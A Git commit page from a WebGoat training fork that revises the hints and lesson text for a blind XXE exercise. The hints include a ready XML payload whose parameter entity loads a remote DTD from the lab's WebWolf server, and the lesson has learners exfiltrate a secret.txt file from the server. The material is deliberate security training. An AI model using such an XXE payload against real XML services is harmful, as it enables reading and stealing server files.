dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

xxe path info (#670)

Browse Source 
* xxe path info aid added

* xxe path info aid added

*  changes to template file and hints

* added ssl test support for XXE

* added ssl test support for XXE

* restconfig replaced by httpsrelaxed

* processed review comments on hints and example
This commit is contained in:
René Zubcevic
2019-10-02 09:59:32 +02:00
committed by GitHub
parent 7536770769
commit 663224d06a
13 changed files with 152 additions and 52 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -42,5 +42,5 @@ xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
xxe.blind.hints.1=This assignment is more complicated you need to upload the contents of a file to the attackers site (WebWolf in this case)
xxe.blind.hints.2=In this case you cannot combine external entities in combination with internal entities.
xxe.blind.hints.3=Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/
xxe.blind.hints.4=An example DTD can be found here WebGoat/images/example.dtd, include this DTD in the xml comment
xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "http://localhost:9090/files/test1234/test.dtd">%remote;]><comment><text>test&send;</text></comment>
xxe.blind.hints.4=An example DTD can be found [[webgoat base url]]/WebGoat/xxe/sampledtd, include this DTD in the xml comment
xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "[[webwolf base url]]/files/[[user]]/test.dtd">%remote;]><comment><text>test&send;</text></comment>

13
webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
View File

@ -1,21 +1,16 @@
== Blind XXE assignment
In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD
which will upload the contents of ~/.webgoat/plugin/XXE/secret.txt to our server. You can use WebWolf to serve your
DTD.
which will upload the contents of a file secret.txt from the WebGoat server to our WebWolf server. You can use WebWolf to serve your DTD.
The secret.txt is located on the WebGoat server in this location, so you do not need to scan all directories and files:
|===
|OS |Location
|Linux
|`/home/USER/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|`operatingSystem:os[]`
|`webGoatTempDir:temppath[]/XXE/secret.txt`
|Windows
|`c:/Users/USER/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|Docker
|`/home/webgoat/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|===
Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink]`